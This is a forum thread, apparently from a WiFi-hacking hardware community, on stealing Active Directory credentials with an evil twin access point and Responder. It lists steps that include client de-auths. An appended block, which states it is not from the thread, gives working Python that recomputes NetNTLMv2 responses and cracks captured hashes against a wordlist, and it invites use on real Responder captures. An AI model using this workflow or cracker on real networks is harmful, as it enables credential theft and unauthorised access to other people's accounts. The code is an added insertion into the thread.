
Snagging AD credentials over WiFi

I have written a blog post on using mubix's discovery to grab AD creds using an evil twin AP and Responder.



• no physical access required

• no driver installations

I can see that the Tetra/Nano have Responder modules, but there isn't much info on using them. I don't have a Pineapple handy at the moment to try it out.

Anyone care to give this a go on tetra/nano? :wink:

Happy to answer any queries on how it works.



I haven't tried it on anything but a Raspberry Pi Zero, but I thought about using the Nano to do it and have not got around to making it happen. The Nano would be best: just plug it in and let it run.


12 hours ago, zone13.io said:


My current setup - TP Link MR3020 + RPi3

Now trying to do it all on a RPi3.

This should be pretty straightforward with a Nano since it has a Responder module already.

Agreed, and I have it set up on a Pi Zero and it works great with Raspbian Lite. The only problems I see with the Nano are that 1.) it runs OpenWrt, 2.) the amount of time it takes for the Nano to start up and get going might not be suitable for this type of attack, and 3.) the antenna. For being small, it is maybe too big a device to carry around and pull this off, as it is noticeable when plugged in.


I think you misunderstood my method here, b0N3z. You don't need to plug the Nano into the USB port. That happens to be the biggest advantage also.

If you watch the demo videos in the 2nd reply, you will see that the machines connect to the rogue AP and give up the creds.


4 hours ago, kamileon said:

So could you not just use a MANA attack with this? That way you don't have to know the SSID; you just need to be within WiFi range of the target.

It can be done. It just needs some tweaking of the configs.

Monitor client probes. Create an evil twin for the open WiFi probe. Assign an IP to the client. Wait till Responder snatches the creds, maybe do a couple of de-auths. Importantly, avoid any DHCP, DNS or HTTP service conflicts.

For the PoC, I wanted to keep it as a simple targeted attack and so off-loaded the router function to an actual WiFi router. It was stable that way, with less tinkering to do.

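What Responder actually "snatches" when a domain-joined client joins the evil twin is a NetNTLMv2 challenge/response, which it logs in the same `user::DOMAIN:challenge:proof:blob` layout hashcat consumes as mode 5600. The following is an added example, not code from this thread, from Responder or from the blog post it links; it recomputes that response from a candidate password (MS-NLMP NTLMv2, with MD4 implemented inline because hashlib's md4 is missing on many OpenSSL 3 builds) so you can see why a captured line is crackable offline. The capture line, the user `jdoe`, the domain `CORP` and the password are constructed here; the server challenge is Responder's default static value, which is also worth knowing as a defender because a constant challenge across negotiations is a tell.

```python
"""Verify a Responder-style NetNTLMv2 capture line against candidate passwords.

Added example: not code from the thread, Responder or the cited blog post.
The sample capture below is fabricated from a known password.
"""
import hmac
import struct

MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed for the NT hash (MD4 of the UTF-16LE password)."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    def rotl(x, n):
        x &= MASK
        return ((x << n) | (x >> (32 - n))) & MASK

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rotl(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)):  # round 2
            a = rotl(a + g(b, c, d) + x[k] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rotl(a + h(b, c, d) + x[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password."""
    return _md4(password.encode("utf-16-le"))


def ntlmv2_response_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def nt_proof_str(response_key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(key, ServerChallenge || blob): the 16-byte field Responder logs."""
    return hmac.new(response_key, server_challenge + blob, "md5").digest()


def parse_capture_line(line: str):
    """Split user::DOMAIN:challenge:proof:blob and sanity-check the hex field lengths."""
    user, empty, domain, challenge, proof, blob = line.strip().split(":", 5)
    if empty != "" or len(challenge) != 16 or len(proof) != 32 or len(blob) < 16:
        raise ValueError("not a NetNTLMv2 capture line")
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def check_candidate(line: str, candidate: str) -> bool:
    """True if `candidate` reproduces the logged NTProofStr for this capture."""
    user, domain, challenge, proof, blob = parse_capture_line(line)
    key = ntlmv2_response_key(candidate, user, domain)
    return hmac.compare_digest(nt_proof_str(key, challenge, blob), proof)


def crack(line: str, wordlist):
    """Return the first word in `wordlist` that matches the capture, else None."""
    return next((w for w in wordlist if check_candidate(line, w)), None)


# Responder's default static server challenge (set in Responder.conf).
RESPONDER_DEFAULT_CHALLENGE = bytes.fromhex("1122334455667788")


def build_capture_line(user, domain, password, server_challenge=RESPONDER_DEFAULT_CHALLENGE):
    """Fabricate the line Responder would log for a client that authenticated with `password`.

    Constructed blob: RespType/HiRespType, reserved bytes, zero timestamp, an 8-byte
    client nonce, reserved, and an empty AV-pair list terminated by MsvAvEOL.
    """
    blob = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + bytes(range(8)) + b"\x00" * 4 + b"\x00" * 4
    proof = nt_proof_str(ntlmv2_response_key(password, user, domain), server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


SAMPLE_LINE = build_capture_line("jdoe", "CORP", "Winter2017!")  # constructed, not a real capture

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack(SAMPLE_LINE, ["password", "Summer2017!", "Winter2017!"]))
```

Feed a real Responder hash file to `crack()` line by line and it behaves like a very slow hashcat; the point is that the response key is derived only from the NT hash, the upper-cased user and the domain, so once the client has talked to the rogue AP's SMB/HTTP listener, nothing else is needed to guess the password offline.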
